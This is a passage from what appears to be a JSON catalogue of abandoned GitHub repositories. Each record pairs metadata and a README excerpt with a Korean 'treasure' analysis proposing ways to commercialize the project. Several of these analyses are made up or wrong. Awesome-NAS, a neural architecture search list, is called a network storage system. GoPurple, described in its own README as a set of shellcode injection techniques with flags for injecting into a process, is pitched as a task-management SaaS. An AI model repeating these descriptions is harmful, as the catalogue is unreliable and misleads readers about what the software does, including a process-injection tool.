原理\n从前四种方案可以看到，单纯的Java层代码是无法监听自身卸载的。既然Java层无法实现，我们试着使用C语言在底层实现。借助Linux进程fork出来的C进程在应用被卸载后不会被销毁，监听/data/data/{package-name}目录是否存在，如果不存在，就证明应用被卸载了。  \n\n本程序采用第5种解决方案，对其进行优化，通过linux中的[inotify](http://man7.org/linux/man-pages/man7/inotify.7.html)机制来监听应用的卸载。\n\n## 实现\n1. fork()子进程\n2. 创建监听文件\n3. 初始化inotify实例\n4. 注册监听事件\n5. 调用read函数开始监听\n6. 卸载反馈统计\n\n## 场景\n1. 正常卸载\n2. 断网卸载\n3. 清除数据（5.0以上不支持）\n4. kill进程（5.0以上不支持）\n5. 插拔USB线\n6. 覆盖安装\n7. 内部存储移到SD卡\n8. 开机监听（官方不推荐）\n9. 打开浏览器（5.0以上部分机型无法开启）\n\n## 参考\n* [http://www.cnblogs.com/zealotrouge/p/3182617.html](http://www.cnblogs.com/zealotrouge/p/3182617.html)\n* [http://www.jianshu.com/p/189e319a5c45](http://www.jianshu.com/p/189e319a5c45)\n* [http://blog.csdn.net/allen315410/article/details/42555415](http://blog.csdn.net/allen","composite_score":0.5131,"license_safety_tag":"safe"},{"name":"lan-tianxiang/jd_shell","github_url":"https://github.com/lan-tianxiang/jd_shell","stars":22,"language":"JavaScript","license":"unknown","abandonment_months":59,"description":"# jd_shell 상용화 분석\n\n## 왜 보물인가\n온라인 쇼핑 자동화 도구로, 반복적인 구매 작업을 프로그램이 대신 처리해주기 때문에 바쁜 사람들의 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 기반 자동 쇼핑 어시스턴트 앱으로, 사용자가 월 구독료를 내고 반복 구매 설정 후 자동으로 주문되게 하기\n2. ","readme_excerpt":"<!--\n[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=lan-tianxiang&show_icons=true&theme=radical&repo=jd_shell)](https://github.com/lan-tianxiang/jd_shell)\n-->\n\n### 旧版暂停更新，忙不过来  答疑交流QQ群967451175\nA1版（新版） https://github.com/lan-tianxiang/js_tool\n\n\n<p align=\"center\">\n <img width=\"100px\" src=\"https://res.cloudinary.com/anuraghazra/image/upload/v1594908242/logo_ccswme.svg\" align=\"center\" alt=\"GitHub Readme Stats\" />\n <h2 align=\"center\">JS SHELL</h2>\n <p align=\"center\">自动化一键完成JS库管理</p>\n</p>\n  <p align=\"center\">\n    <a href=\"https://github.com/lan-tianxiang/jd_shell/blob/master/LICENSE\"><img alt=\"GitHub\" src=\"https://img.shields.io/github/license/lan-tianxiang/jd_shell.svg?label=License&style=for-the-badge\"></a>\n    <a href=\"https://github.com/lan-tianxiang/jd_shell/issues\"><img alt=\"Issues\" src=\"https://img.shields.io/github/issues/lan-tianxiang/jd_shell?color=0088ff&style=for-the-badge\" /></a>\n    <a href=\"https://github.com/lan-tianxiang/jd_shell/stargazers\"><img a","composite_score":0.513,"license_safety_tag":"unknown"},{"name":"fmeringdal/nettu-meet","github_url":"https://github.com/fmeringdal/nettu-meet","stars":15,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":33,"description":"# nettu-meet 상업화 분석\n\n## 왜 보물인가\n누구나 쉽게 화상회의를 개최하고 관리할 수 있는 자체 운영형 플랫폼으로, 큰 비용 없이 Zoom이나 Google Meet 같은 서비스를 직접 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **원격 교육 회사의 SaaS 서비스**: 학원이나 온라인 교육 기업이 자신의 브랜드로 화상수업 플랫폼을 제","readme_excerpt":"<div align=\"center\">\n<img width=\"400\" src=\"docs/logo.png\" alt=\"logo\">\n</div>\n\n## Overview\n\n`Nettu Meet` is an open source video conference web application designed for interactive online tutoring. Some of the features included are:\n\n- **Audio and video**: Real-time sharing of audio and video.\n- **Shared whiteboard**: Collaborate with students on a shared whiteboard.\n- **Screen sharing**: Go to presenting mode by sharing your screen.\n- **Chat**: Send simple messages to other participants of the meeting.\n- **File sharing**: Upload relevant files to the meeting.\n- **Graph plotter**: Insert mathematical graphs to the whiteboard.\n- **Customizable**: Create an account and upload your own logos. \n\n<br />\n<div align=\"center\">\n<img src=\"docs/app.png\" alt=\"\"/>\n</div>\n<br />\n\n\n\n<br/>\n\n## Live demo\n\n[Live demo](https://meet.nettubooking.com) \n\n## Run it locally\n* Run the Node.js server application in a terminal:\n\n```bash\n$ cd server\n# Copy .env.template secrets file and adjust them if needed\n$ cp ","composite_score":0.513,"license_safety_tag":"risky"},{"name":"peng-zhihui/ESP32-PicoDK","github_url":"https://github.com/peng-zhihui/ESP32-PicoDK","stars":7,"language":"C","license":"unknown","abandonment_months":47,"description":"# ESP32-PicoDK 분석 리포트\n\n## 왜 보물인가\n초소형 컴퓨터(ESP32)를 활용해 누구나 간단하게 스마트 기기나 IoT 제품을 만들 수 있는 개발 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트홈/스마트오피스 제어 플랫폼 - 사용자가 직접 센서와 제어기를 설치·연결\n2. **내부 업무 도구**: 제조업체의 라인","readme_excerpt":"# 基于ESP32-PicoD4的开源迷你开发板\n最近芯片疯狂涨价，ST系列的MCU价格已经上天，所以后面打算以ESP32为项目的主力平台。\n\n> 实际上ESP32性能比STM32还强不少：\n>\n> * 双核架构，主频还高\n> * 带WiFi/蓝牙能力（SiP封装内带射频匹配电路）\n> * 原生基于FreeRTOS\n> * 直接兼容Arduino生态\n> * GPIO-Matrix（神器，GPIO互换，PCB Layout友好度拉满）\n> * 接口丰富（3个UART、2个I2C、2个SPI、**居然还带CAN**）\n> * SiP封装，外围电路极其简洁\n\n最重要的，在芯片价格涨麻了的今天，ESP32只要十多元一片，好家伙我直接推爆好吗。\n\n同时为了方便以后做原型验证，需要用有一个评估板，看了一圈市面上并没有很满意的（连TypeC的都没几个），所以花了一下午自己设计了一个，也开源给大家。\n\n**板子设计已打样验证无误，好用记得点星星**👇\n\n![0](4.Docs/1.Images/0.jpg)\n\n##  特性\n\n* 所有GPIO引出\n* 板载一个MPU6050、一个OLED、一个CAN-PHY芯片、一个USB转串口、一个用户LED、一个用户按键\n* 上面提到的外设芯片都是可以在板子背面通过**跳线**选择连接GPIO或者断开的，所以不影响GPIO作其他用途\n* 极致迷你尺寸\n* 带配套亚克力外壳（设计中稍后更新）\n\n![1](/4.Docs/1.Images/1.jpg)\n\n![2](/4.Docs/1.Images/2.jpg)\n\n![3](4.Docs/1.Images/3.jpg)\n\n![sch](4.Docs/1.Images/sch.jpg)","composite_score":0.5129,"license_safety_tag":"unknown"},{"name":"reach/router","github_url":"https://github.com/reach/router","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# reach/router 상품화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 클릭한 버튼에 따라 화면을 자동으로 전환해주는 기술로, 모든 온라인 서비스의 기본 구조를 담당합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 프로젝트 관리 도구(클릭 → 상세 페이지 이동)나 협업 플랫폼의 화면 전환 기능\n- **내부 업무 도구**: 대기업","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://reach.tech/router/\">\n    <img alt=\"Reach Router\" src=\"./logo-horizontal.png\" width=\"400\">\n  </a>\n</p>\n\n<p align=\"center\">\n  Next Generation Routing for <a href=\"https://facebook.github.io/react\">React</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/@reach/router\"><img src=\"https://img.shields.io/npm/v/@reach/router.svg?style=flat-square\"></a>\n  <a href=\"https://www.npmjs.com/package/@reach/router\"><img src=\"https://img.shields.io/npm/dm/@reach/router.svg?style=flat-square\"></a>\n  <a href=\"https://travis-ci.org/reach/router\"><img src=\"https://img.shields.io/travis/reach/router/master.svg?style=flat-square\"></a>\n</p>\n\n## Documentation\n\n[Documentation Site](https://reach.tech/router)\n\nYou can also find the docs in the [website directory](./website/src/markdown).\n\n## Community\n\n[Join us on Spectrum](https://spectrum.chat/reach)\n\n## Legal\n\nMIT License\nCopyright (c) 2018-present, Ryan Florence\n","composite_score":0.5129,"license_safety_tag":"safe"},{"name":"sh4hin/GoPurple","github_url":"https://github.com/sh4hin/GoPurple","stars":498,"language":"Go","license":"unknown","abandonment_months":63,"description":"# GoPurple 분석 보고서\n\n## 왜 보물인가\n498개의 별을 받은 인기 있는 프로젝트로, Go 언어 기반의 실용적인 도구로 개발자들 사이에서 신뢰받고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 자동화된 작업 관리 플랫폼으로 기업 고객에게 구독 형태로 판매\n2. **내부 업무 도구**: 대기업의 개발팀이 자신의 시스템 관리를 ","readme_excerpt":"# GoPurple\n\nThis project is a simple collection of various shell code injection techniques, aiming to streamline the process of endpoint detection evaluation, beside challenging myself to get into Golang world.\n\n\n\n\n# Installation\n\n1 - Requires [go](https://golang.org/dl/) installed.\n\n2 - Build the application from the project's directory: `go build`. Set `GOOS=windows` if the build system is not Windows.\n\n\n```\n  _____                              _\n  / ____|                            | |\n | |  __  ___  _ __  _   _ _ __ _ __ | | ___\n | | |_ |/ _ \\| '_ \\| | | | '__| '_ \\| |/ _ \\\n | |__| | (_) | |_) | |_| | |  | |_) | |  __/\n  \\_____|\\___/| .__/ \\__,_|_|  | .__/|_|\\___|\n              | |              | |\n              |_|              |_|   by @s3cdev\n\n -a string\n        Program command line arguments\n  -b string\n        block DLL mode (nonms/onlystore for QueueUserAPC )\n  -p int\n        Process ID to inject shellcode into\n  -prog string\n        program to inject into\n  -t string\n       ","composite_score":0.5129,"license_safety_tag":"unknown"},{"name":"D-X-Y/Awesome-NAS","github_url":"https://github.com/D-X-Y/Awesome-NAS","stars":5,"language":"Python","license":"MIT","abandonment_months":45,"description":"# Awesome-NAS 보물 평가서\n\n## 왜 보물인가\n집이나 사무실의 저장 공간을 스스로 만들고 관리할 수 있는 오픈소스 솔루션으로, 비용을 절감하면서도 데이터를 완전히 통제할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 내부 저장소 서비스**: 회사 직원들이 파일을 안전하게 저장하고 공유하는 클라우드 시스템\n2. **소규모 스튜디오 백업 ","readme_excerpt":"<font size=6><center><big><b> Awesome AutoDL [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) </b></big></center></font>\n\nA curated list of automated deep learning related resources. Inspired by [awesome-deep-vision](https://github.com/kjw0612/awesome-deep-vision), [awesome-adversarial-machine-learning](https://github.com/yenchenlin/awesome-adversarial-machine-learning), [awesome-deep-learning-papers](https://github.com/terryum/awesome-deep-learning-papers), and [awesome-architecture-search](https://github.com/markdtw/awesome-architecture-search).\n\nPlease feel free to [pull requests](https://github.com/D-X-Y/Awesome-AutoDL/pulls) or [open an issue](https://github.com/D-X-Y/Awesome-AutoDL/issues) to add papers.\n\n---\n\n<font size=5><center><b> Table of Contents </b> </center></font>\n\n- [Awesome Blogs](#awesome-blogs)\n- [Awesome AutoDL Libraies](#awesome-autodl-libraies)\n- [Awesome Benchmarks](#awesome-benchmarks)\n- [Deep Learning-based NAS and HPO](#deep-learning-based-nas-a","composite_score":0.5129,"license_safety_tag":"safe"},{"name":"LaoGong-zp/Transformer","github_url":"https://github.com/LaoGong-zp/Transformer","stars":498,"language":"Jupyter Notebook","license":"unknown","abandonment_months":57,"description":"# Transformer 저장소 분석\n\n## 왜 보물인가\n인공지능이 텍스트를 이해하고 번역, 요약, 질답하도록 하는 핵심 기술의 오픈소스 구현으로, 498개의 프로젝트별 인용으로 검증된 실용적 코드입니다.\n\n## 어디에 쓸 수 있나\n1. **자동 고객상담 SaaS**: 상담사 없이 고객 질문에 자동으로 답변하는 채팅봇 서비스\n2. **기업 문서 요약 도구*","readme_excerpt":"此项目为Transformer学习使用，项目内文件说明如下：\r\n\r\n1、文件Transformer_train.ipynb：为Transformer模型训练的jupyter notebook代码\r\n\r\n2、文件Transformer_test.ipynb：为Transformer模型测试使用的jupyter notebook代码\r\n\r\n3、目录tokenizer：保存训练过程中生成的subwords，供模型断点续训、模型测试时使用\r\n\r\n4、目录checkpoint：模型训练时产生的checkpoint，保存模型的训练参数、optimizer，供模型断点续训、模型测试时使用\r\n\r\n5、课件：Transformer知识要点的整理，B站讲解视频中的课件\r\n\r\n\r\n\r\n觉得有帮助的话，给个star鼓励一下吧~~ 期待您的关注","composite_score":0.5128,"license_safety_tag":"unknown"},{"name":"matus-chochlik/oglplus","github_url":"https://github.com/matus-chochlik/oglplus","stars":499,"language":"C++","license":"BSL-1.0","abandonment_months":56,"description":"# OGLPlus 저장소 분석\n\n## 왜 보물인가\n3D 그래픽 프로그래밍을 쉽게 만드는 도구로, 영화 특수효과, 게임, 건축 시뮬레이션 같은 시각적 작업에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **3D 시각화 SaaS**: 부동산 회사를 위한 건물 내부 투어 서비스나 의료 기관을 위한 해부학 교육 플랫폼\n2. **게임 개발 SDK**: 인디 게임 ","readme_excerpt":"==============\nOGLplus README\n==============\n\n:Author: Matúš Chochlík <chochlik@gmail.com>\n\n.. contents::\n\n.. _OpenGL: http://opengl.org/\n.. _OpenAL: http://openal.org/\n.. _EGL: http://www.khronos.org/egl\n.. _OGLplus: http://oglplus.org/\n.. _CMake: http://www.cmake.org/\n.. _Doxygen: http://www.doxygen.org/\n.. _Inkscape: http://inkscape.org/\n.. _libPNG: http://www.libpng.org/\n.. _GLEW: http://glew.sourceforge.net/\n.. _GL3W: http://github.com/shakesoda/gl3w\n.. _GLFW: http://www.glfw.org/\n.. _FreeGLUT: http://freeglut.sourceforge.net/\n.. _SDL: http://www.libsdl.org/\n.. _wxGL: http://www.wxwidgets.org/\n.. _Qt: http://qt.digia.com/\n\nImportant note\n--------------\n\nPlease note that this project is obsolete and deprecated.\nA new version of EGL, OpenGL, OpenAL wrapper using modern C++ is implemented\nby the `eagine-all` project and its sub-modules:\n\n * https://github.com/matus-chochlik/eagine-all\n\n   * https://github.com/matus-chochlik/eagine-core\n   * https://github.com/matus-chochlik/eagine-ss","composite_score":0.5128,"license_safety_tag":"unknown"},{"name":"FooBarWidget/debian-packaging-for-the-modern-developer","github_url":"https://github.com/FooBarWidget/debian-packaging-for-the-modern-developer","stars":500,"language":"Shell","license":"unknown","abandonment_months":72,"description":"# FooBarWidget/debian-packaging-for-the-modern-developer 분석\n\n## 왜 보물인가\n리눅스 서버를 운영하는 기업들이 소프트웨어를 더 쉽게 설치하고 관리할 수 있게 해주는 현대적인 방법론을 제시합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 배포 관리 서비스**: 개발사들이 고객 서버에 자신의 소프트웨어를 자","readme_excerpt":"# Debian Packaging For The Modern Developer (DPMD)\n\nWelcome to DPMD\n\n**Table of contents**\n\n * Why should DevOps people learn Debian packaging?\n * Why should open source application developers learn Debian packaging?\n * Welcome to DPMD\n * Tutorials\n * Guides\n * References\n\n---\n\n## Why should DevOps people learn Debian packaging?\n\nIn this day and age where new paradigms and languages such as DevOps, Node.js, Ruby, Go and next-gen JVM languages reign surpreme, people are constantly looking for the best way to manage their application and infrastructure deployments. People are flocking to Docker, or to custom schemes such as uploading binary tarballs to the server or even compiling on the server. But Docker requires large infrastructure overhauls as well as a lot of staff retraining. Once you start investing efforts towards that, it's hard to turn back even if there are more suitable alternatives. Binary tarballs are hard to manage, while compiling on the server is slow. Plus, none of the","composite_score":0.5128,"license_safety_tag":"unknown"},{"name":"LogRocket/redux-logger","github_url":"https://github.com/LogRocket/redux-logger","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":70,"description":"# Redux Logger 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션의 복잡한 동작을 자동으로 기록하고 추적할 수 있는 도구로, 개발자들의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 분석 대시보드**: 고객들이 자신의 웹앱 동작을 실시간으로 모니터링하고 문제를 빠르게 찾는 서비스\n2. **내부 업무 도구**: 대","readme_excerpt":"# Logger for Redux\n[![npm](https://img.shields.io/npm/v/redux-logger.svg?maxAge=2592000?style=plastic)](https://www.npmjs.com/package/redux-logger)\n[![npm](https://img.shields.io/npm/dm/redux-logger.svg?maxAge=2592000?style=plastic)](https://www.npmjs.com/package/redux-logger)\n[![Build Status](https://circleci.com/gh/LogRocket/redux-logger/tree/master.svg?style=svg)](https://circleci.com/gh/LogRocket/redux-logger/tree/master)\n\n![redux-logger](http://i.imgur.com/CgAuHlE.png)\n\nNow maintained by [LogRocket](https://logrocket.com?cid=github_redux)!\n\n[![](https://i.imgur.com/Yp5mUx2.png)](https://logrocket.com?cid=github_redux)\n\n> LogRocket is a production Redux logging tool that lets you replay problems as if they happened in your own browser. Instead of guessing why errors happen, or asking users for screenshots and log dumps, LogRocket lets you replay Redux actions + state, network requests, console logs, and see a video of what the user saw.\n\nFor more informatiom about the future of red","composite_score":0.5128,"license_safety_tag":"safe"},{"name":"cesarferreira/alfi","github_url":"https://github.com/cesarferreira/alfi","stars":499,"language":"Ruby","license":"MIT","abandonment_months":89,"description":"# alfi 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 라이브러리를 쉽게 찾고 관리할 수 있도록 돕는 검색 도구로, 개발 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS**: 안드로이드 개발자들을 위한 월구독 라이브러리 검색 및 추천 플랫폼\n2. **기업 내부 도구**: 대규모 앱 개발사의 코드 재사","readme_excerpt":"# alfi \n\n![](http://ruby-gem-downloads-badge.herokuapp.com/alfi?type=total)\n[![Build Status](https://travis-ci.org/cesarferreira/alfi.svg?branch=master)](https://travis-ci.org/cesarferreira/alfi) \n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/3bb069aaf971480abe5cd8242fafb191)](https://www.codacy.com/app/cesarferreira/alfi?utm_source=github.com&utm_medium=referral&utm_content=cesarferreira/alfi&utm_campaign=badger)\n[![Gem Version](http://img.shields.io/gem/v/alfi.svg?style=flat)](http://badge.fury.io/rb/alfi) \n\n**A**ndroid **L**ibrary **Fi**nder\n\nSearch through thousands of android libraries that can help you scale your projects elegantly\n\n## Usage\n\nSearch for `something`\n\n```bash\nalfi picasso\n```\n\n<p align=\"center\">\n<img src=\"https://raw.github.com/cesarferreira/alfi/master/extras/images/terminal01.gif\" />\n</p>\n\n\nSearch for `something` by repository\n\n```bash\nalfi picasso --repository maven\n```\n\nThis will search picasso only on maven, you can also define multiple repositor","composite_score":0.5128,"license_safety_tag":"safe"},{"name":"boostcon/cppnow_presentations_2017","github_url":"https://github.com/boostcon/cppnow_presentations_2017","stars":499,"language":"","license":"unknown","abandonment_months":90,"description":"# boostcon/cppnow_presentations_2017 분석\n\n## 왜 보물인가\n전 세계 C++ 개발자들이 공유한 최신 기술 강의 자료 모음으로, 프로그래밍 교육 및 기업 교육 콘텐츠로 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로그래머 교육 플랫폼에서 구독형 강의 콘텐츠로 제공\n2. **내부 업무 도구**","readme_excerpt":"=========================\nC++Now 2017 Presentations\n=========================\n\n|guidelines|_\n\n.. |guidelines| replace:: **Slide Deck Guidelines for Speakers**\n.. _guidelines: SLIDE_DECK_GUIDELINES.md\n\nTuesday, May 16\n===============\n\n+-----------------------+----------------------------+\n|                       | Paepcke                    |\n+=======================+============================+\n| Morning (9:00-10:30)  | |tueAM0pae|  |tueAM0paeV|_ | \n+-----------------------+----------------------------+\n\n+-----------------------+----------------------------+----------------------------+----------------------------+\n|                       | Flug                       | Hudson                     | Bethe                      |\n+=======================+============================+============================+============================+\n| Morning (11:00-12:30) | |tueAM2flg|_ |tueAM2flgV|_ | |tueAM2hud|_ |tueAM2hudV|_ | |tueAM2bet|  |tueAM2betV|_ |\n+-----------------------+------------","composite_score":0.5128,"license_safety_tag":"unknown"},{"name":"JamesZBL/java_design_patterns","github_url":"https://github.com/JamesZBL/java_design_patterns","stars":7,"language":"Java","license":"MIT","abandonment_months":99,"description":"# JamesZBL/java_design_patterns 상품화 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 안정적이고 재사용 가능한 코드를 작성하기 위해 참고하는 설계 패턴 모음집으로, 많은 기업의 개발팀에서 필수 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n- **개발자 교육 플랫폼**: 프로그래밍 학원이나 온라인 강의 사이트에서 유료 강좌의 교재로 ","readme_excerpt":"# Java 实现的面向对象软件设计模式\n\n\n[![License MIT](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/JamesZBL/java_design_patterns/blob/master/LICENSE)\n[![Build status](https://travis-ci.org/JamesZBL/java_design_patterns.svg?branch=master)](https://travis-ci.org/JamesZBL/java_design_patterns)\n[![Gitter](https://img.shields.io/gitter/room/nwjs/nw.js.svg)](https://gitter.im/java_design_patterns/)\n\n设计模式（Design pattern）是用于面向对象程序设计的、有效提高代码重用效率、有着明确使用场景分类的程序设计规范的总结。使用设计模式的\n目的：为了代码可重用性、让代码更容易被他人理解、保证代码可靠性。 设计模式使代码编写真正工程化；设计模式是软件工程的基石脉络，如同大厦\n的结构一样。在程序设计中\n引入设计模式可以提高代码的可读性和程序运行时的可靠性，使程序设计得到规范和统一。\n\n设计模式代表了最佳的实践，通常被有经验的面向对象的软件开发人员所采用。设计模式是软件开发人员在软件开发过程中面临\n的一般问题的解决方案。这些解决方案是众多软件开发人员经过相当长的一段时间的试验和错误总结出来的。\n\n设计模式是一套被反复使用的、多数人知晓的、经过分类编目的、代码设计经验的总结。使用设计模式是为了重用代码、让代码更容易被他人理解、\n保证代码可靠性。 毫无疑问，设计模式于己于他人于系统都是多赢的，设计模式使代码编制真正工程化，设计模式是软件工程的基石，如同大厦的\n一块块砖石一样。项目中合理地运用设计模式可以完美地解决很多问题，每种模式在现实中都有相应的原理来与之对应，每种模式都描述了一个在我们\n周围不断重复发生的问题，以及该问题的核心解决方案，这也是设计模式能被广泛应用的原因。\n\n## 目录\n\n### 构建模式\n\n* Builder （创建者）\n\n* Abstract F","composite_score":0.5127,"license_safety_tag":"safe"},{"name":"MorvanZhou/NLP-Tutorials","github_url":"https://github.com/MorvanZhou/NLP-Tutorials","stars":5,"language":"Python","license":"MIT","abandonment_months":37,"description":"# NLP-Tutorials 보물 분석\n\n## 왜 보물인가\n자연언어처리(텍스트 이해 기술)를 배우고 싶은 사람들을 위해 실제 동작하는 예제 코드를 무료로 제공하는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n- **고객 만족도 분석 SaaS**: 기업들이 고객 리뷰를 자동으로 분석하는 웹 서비스로 월 구독료 수익화\n- **채용 공고 자동 분류 도구**: 인","readme_excerpt":"# Natural Language Processing Tutorial\n\nTutorial in Chinese can be found in [mofanpy.com](https://mofanpy.com/tutorials/machine-learning/nlp/).\n\nThis repo includes many simple implementations of models in Neural Language Processing (NLP).\n\nAll code implementations in this tutorial are organized as following:\n\n1. Search Engine\n  - [TF-IDF numpy / TF-IDF skearn](#TF-IDF)\n2. Understand Word (W2V)\n  - [Continuous Bag of Words (CBOW)](#Word2Vec)\n  - [Skip-Gram](#Word2Vec)\n3. Understand Sentence (Seq2Seq)\n  - [seq2seq](#Seq2Seq)\n  - [CNN language model](#CNNLanguageModel)\n4. All about Attention\n  - [seq2seq with attention](#Seq2SeqAttention)\n  - [Transformer](#Transformer)\n5. Pretrained Models\n  - [ELMo](#ELMO)\n  - [GPT](#GPT)\n  - [BERT](#BERT)\n\nThanks for the contribution made by [@W1Fl](https://github.com/W1Fl) with a simplified keras codes in [simple_realize](simple_realize).\nAnd the a [pytorch version of this NLP](/pytorch) tutorial made by [@ruifanxu](https://github.com/ruifan831).\n\n## ","composite_score":0.5127,"license_safety_tag":"safe"},{"name":"52CV/CVPR-2021-Papers","github_url":"https://github.com/52CV/CVPR-2021-Papers","stars":11,"language":"","license":"unknown","abandonment_months":50,"description":"# CVPR 2021 논문 저장소 분석\n\n## 왜 보물인가\n세계 최고 수준의 컴퓨터 비전(사진/영상 인식) 학회의 논문들을 한곳에 모아놓아서, 최신 AI 기술 트렌드를 빠르게 파악할 수 있는 지식 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이미지 분석 SaaS 플랫폼**\n- 제조업체를 위한 상품 결함 자동 검사 도구로 출시 가능\n\n**2. 기업용 비","readme_excerpt":"# CVPR2021最新信息及已接收论文/代码(持续更新)\n\n\n官网链接：http://cvpr2021.thecvf.com<br>\n开会时间：2021年6月19日-6月25日<br>\n论文接收公布时间：2021年2月28日<br>\n\n接收论文IDs：<br>\n\n* [CVPR 2021 接收论文列表！27%接受率！](https://zhuanlan.zhihu.com/p/353686917)\n\n# :exclamation::exclamation::exclamation:🌟🌟🌟 CVPR 2021 收录论文已全部公布，下载可在【我爱计算机视觉】后台回复“CVPR2021”，即可收到。共计 1660 篇。\n\n# :exclamation::exclamation::exclamation:🌟🌟🌟 全部论文已粗略分类完毕，请查阅。\n\n### :exclamation::exclamation::exclamation:注：后续论文的细致分类汇总将发布在公众号【OpenCV中文网】，敬请关注。\n\n## 历年综述论文分类汇总戳这里↘️[CV-Surveys](https://github.com/52CV/CV-Surveys)施工中~~~~~~~~~~\n\n## 2022 年论文分类汇总戳这里\n↘️[CVPR-2022-Papers](https://github.com/52CV/CVPR-2022-Papers)\n↘️[WACV-2022-Papers](https://github.com/52CV/WACV-2022-Papers)\n\n## 2021年论文分类汇总戳这里\n↘️[ICCV-2021-Papers](https://github.com/52CV/ICCV-2021-Papers)\n↘️[CVPR-2021-Papers](https://github.com/52CV/CVPR-2021-Papers)\n\n## 2020 年论文分类汇总戳这里\n↘️[CVPR-2020-Papers](https://github.com/52CV/CVPR-2020-Papers)\n↘️[ECCV-2020-Papers](https://github.com/52CV/ECCV-2020-Papers)\n\n# 目录\n\n|:dog:|:mouse:|:ha","composite_score":0.5127,"license_safety_tag":"unknown"},{"name":"FlexMonkey/ParticleLab","github_url":"https://github.com/FlexMonkey/ParticleLab","stars":500,"language":"Swift","license":"unknown","abandonment_months":87,"description":"# ParticleLab 평가 분석\n\n## 왜 보물인가\n복잡한 입자 효과를 쉽게 만들고 시뮬레이션할 수 있는 도구로, 게임, 영화, 과학 교육 등 다양한 분야에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 웹 기반 입자 효과 편집 플랫폼으로 운영하여 디자이너가 코드 없이 폭발, 연기, 불 효과를 만들도록 제공\n**2.","readme_excerpt":"# ParticleLab - High Performance Particles in Swift and Metal\nParticle system that's both calculated and rendered on the GPU using the Metal framework\n\n![http://flexmonkey.co.uk/swift/IMG_0699.PNG](http://flexmonkey.co.uk/swift/IMG_0699.PNG)\n\nThis is the most highly optimised version of my Swift and Metal particles system; managing over 40 fps with four million particles and four gravity wells. It manages this by rendering to a MetalKit MTKView rather than converting a texture to a UIImage and by passing in four particle definitions per step with a float4x4 rather than a particle struct.\n\nYou can read about these recent changes at my blog:\n\n* A First Look at Metal for OS X: http://flexmonkey.blogspot.co.uk/2015/06/a-first-look-at-metal-for-os-x-el.html\n* CAMetalLayer work: http://flexmonkey.blogspot.co.uk/2015/03/swift-metal-four-million-particles-on.html\n* Use of float4x4: http://flexmonkey.blogspot.co.uk/2015/03/mind-blowing-metal-four-million.html\n\nThis branch wraps up all the Metal","composite_score":0.5126,"license_safety_tag":"unknown"},{"name":"Dairongpeng/algorithm-note","github_url":"https://github.com/Dairongpeng/algorithm-note","stars":10,"language":"Go","license":"Apache-2.0","abandonment_months":45,"description":"# algorithm-note 저장소 분석\n\n## 왜 보물인가\n복잡한 문제를 푸는 방법들을 정리한 학습 자료로, 소프트웨어 개발자들이 필요한 핵심 지식을 빠르게 습득할 수 있는 참고서입니다.\n\n## 어디에 쓸 수 있나\n- **코딩 교육 플랫폼**: 초보자부터 중급자까지 단계별로 학습할 수 있는 강의 콘텐츠로 활용\n- **기업 내부 교육 도구**: 신입 개발","readme_excerpt":"# 《algorithm-note》中文版\n\n## 笔记简介\n\n* 对于常用数据结构及算法的系统性总结，java版本参考algorithm-note-java分支，master分支基于Golang实现。\n* 出发点是，算法内容杂且难，系统性整理当成工具书查阅，可以有效帮助复习\n* 如果本系列对您有用，求个star~\n\n## 笔记阅读传送门\n\n- 完整阅读：[进入](https://www.yuque.com/dairongpeng/no7xzv/zw88wn)\n\n## 目录概览\n\n- [x] [第一节 复杂度、排序、二分、异或](https://www.yuque.com/dairongpeng/no7xzv/tkqyqh)\n- [x] [第二节 链表、栈、队列、递归、哈希表、顺序表](https://www.yuque.com/dairongpeng/no7xzv/wxk6gu)\n- [x] [第三节 归并排序、随机快排介绍](https://www.yuque.com/dairongpeng/no7xzv/wck819)\n- [x] [第四节 堆、结构体排序](https://www.yuque.com/dairongpeng/no7xzv/wck819)\n- [x] [第五节 前缀树、桶排序以及排序总结](https://www.yuque.com/dairongpeng/no7xzv/mkuhxb)\n- [x] [第六节 链表相关高频题总结](https://www.yuque.com/dairongpeng/no7xzv/zk422u)\n- [x] [第七节 二叉树基本算法](https://www.yuque.com/dairongpeng/no7xzv/os4mpm)\n- [x] [第八节 二叉树的递归解题思路](https://www.yuque.com/dairongpeng/no7xzv/bvkf4t)\n- [x] [第九节 贪心算法解题思路](https://www.yuque.com/dairongpeng/no7xzv/runxe4)\n- [x] [第十节 并查集、图相关算法介绍](https://www.yuque.com/dairongpeng/no7xzv/fssemq)\n- [x] [第十一节 暴力递归、动态规划](https://","composite_score":0.5126,"license_safety_tag":"safe"},{"name":"TakuSemba/MultiSnapRecyclerView","github_url":"https://github.com/TakuSemba/MultiSnapRecyclerView","stars":30,"language":"Kotlin","license":"Apache-2.0","abandonment_months":63,"description":"# 